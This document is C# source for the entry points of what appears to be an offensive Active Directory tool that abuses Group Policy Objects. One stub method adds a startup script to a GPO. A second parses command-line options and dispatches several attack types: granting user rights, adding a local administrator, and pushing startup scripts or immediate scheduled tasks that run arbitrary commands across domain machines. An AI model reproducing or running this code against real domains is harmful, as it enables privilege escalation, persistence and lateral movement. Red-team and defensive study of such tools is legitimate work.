static void Main(string[] args) { // CHANGE THESE string ScriptName = ""; string ScriptContent = ""; string GPOName = ""; try { Domain currentDomain = Domain.GetCurrentDomain(); string DomainController = currentDomain.PdcRoleOwner.Name.ToLower(); string DomainName = currentDomain.Name.ToLower(); string[] DCs; string DistinguishedName = "CN=Policies,CN=System"; DCs = DomainName.Split('.'); foreach (string DC in DCs) { DistinguishedName += ",DC=" + DC; } Console.WriteLine($"[+] Domain = {DomainName}"); Console.WriteLine($"[+] Domain Controller = {DomainController}"); Console.WriteLine($"[+] Distinguished Name = {DistinguishedName}"); // CHANGE THIS StartupScript.NewStartupScript(ScriptName, ScriptContent, DomainName, DomainController, GPOName, DistinguishedName, "User"); } catch (Exception e) { Console.Error.WriteLine("[!] {0}", e.Message); } }
static void Main(string[] args) { string GPOName; string ScriptName; string ScriptContent; string UserAccount; string[] UserRights; string Author; string TaskName; string Command; string Arguments; string ObjectType; bool Force; string[] required; try { string[] keys = new string[] { "attack", "gponame", "useraccount", "userrights", "scriptname", "scriptcontent", "author", "taskname", "command", "arguments", "type", "force" }; var arguments = new Dictionary <string, string>(); string allargs = String.Join(" ", args); string oldkey = String.Empty; string currkey = String.Empty; string currval = String.Empty; // mynew=friend never=believes potatoe=darkess of the soul== for (int i = 0; i < allargs.Length; i++) { if (i == allargs.Length - 1 && currkey.Length > 0 && !arguments.ContainsKey(currkey)) { currval = currval + allargs[i]; arguments[currkey] = currval; } else if (allargs[i].ToString() == "=" && HasWalkedBackKey(i, allargs, keys)) { oldkey = currkey; currkey = GetWalkedBackKey(i, allargs, keys); // Save previous if exists if (oldkey.Length > 0) { char[] charsToTrim = { ' ' }; arguments[oldkey] = ChopEnd(currval, currkey).TrimEnd(charsToTrim); } currval = String.Empty; } else { currval = currval + allargs[i]; } } DebugArgs(arguments, keys); Domain currentDomain = Domain.GetCurrentDomain(); string DomainController = currentDomain.PdcRoleOwner.Name.ToLower(); string DomainName = currentDomain.Name.ToLower(); string[] DCs; string DistinguishedName = "CN=Policies,CN=System"; Console.WriteLine($"[+] Domain = {DomainName}"); Console.WriteLine($"[+] Domain Controller = {DomainController}"); Console.WriteLine($"[+] Distinguished Name = {DistinguishedName}"); DCs = DomainName.Split('.'); foreach (string DC in DCs) { DistinguishedName += ",DC=" + DC; } if (arguments.ContainsKey("attack")) { string AttackName = arguments["attack"]; if (AttackName.ToLower() == "addnewrights") { required = new string[] { "gponame", "useraccount", "userrights" }; if (ContainsAll(arguments, required)) { GPOName = arguments["gponame"]; UserAccount = arguments["useraccount"]; UserRights = arguments["userrights"].Split(','); UserRightAssignment.AddNewRights(DomainName, DomainController, GPOName, DistinguishedName, UserRights, UserAccount); } else { Console.WriteLine("Missing Arguments for Attack Type!"); PrintHelp(); } } else if (AttackName.ToLower() == "newlocaladmin") { required = new string[] { "gponame", "useraccount" }; if (ContainsAll(arguments, required)) { GPOName = arguments["gponame"]; UserAccount = arguments["useraccount"]; if (arguments.ContainsKey("force") && arguments["force"].ToLower() == "true") { Force = true; Console.WriteLine($"[+] Argument force: Resolved to True"); } else { Console.WriteLine($"[+] Argument force: Resolved to False"); Force = false; } LocalAdmin.NewLocalAdmin(UserAccount, DomainName, DomainController, GPOName, DistinguishedName, Force); } else { Console.WriteLine("Missing Arguments for Attack Type!"); PrintHelp(); } } else if (AttackName.ToLower() == "newstartupscript") { required = new string[] { "gponame", "scriptname", "scriptcontent" }; if (ContainsAll(arguments, required)) { GPOName = arguments["gponame"]; ScriptName = arguments["scriptname"]; ScriptContent = arguments["scriptcontent"]; if (arguments.ContainsKey("type") && arguments["type"].ToLower() == "computer") { ObjectType = "Computer"; } else { ObjectType = "User"; } Console.WriteLine($"[+] Argument type: Resolved to {ObjectType}"); StartupScript.NewStartupScript(ScriptName, ScriptContent, DomainName, DomainController, GPOName, DistinguishedName, ObjectType); } else { Console.WriteLine("Missing Arguments for Attack Type!"); PrintHelp(); } } else if (AttackName.ToLower() == "newimmediatetask") { required = new string[] { "gponame", "author", "taskname", "command", "arguments" }; if (ContainsAll(arguments, required)) { GPOName = arguments["gponame"]; Author = arguments["author"]; TaskName = arguments["taskname"]; Command = arguments["command"]; Arguments = arguments["arguments"]; if (arguments.ContainsKey("type") && arguments["type"].ToLower() == "computer") { ObjectType = "Computer"; } else { ObjectType = "User"; } Console.WriteLine($"[+] Argument type: Resolved to {ObjectType}"); if (arguments.ContainsKey("force") && arguments["force"].ToLower() == "true") { Force = true; Console.WriteLine($"[+] Argument force: Resolved to True"); } else { Console.WriteLine($"[+] Argument force: Resolved to False"); Force = false; } ScheduledTask.NewImmediateTask(DomainName, DomainController, GPOName, DistinguishedName, TaskName, Author, Arguments, Command, Force, ObjectType); } else { Console.WriteLine("Missing Arguments for Attack Type!"); PrintHelp(); } } else { Console.WriteLine("Unsupported Attack Type! Sorry!"); PrintHelp(); } } else { Console.WriteLine("No Attack Provided!"); PrintHelp(); } } catch (Exception e) { Console.Error.WriteLine("[!] {0}", e.Message); } }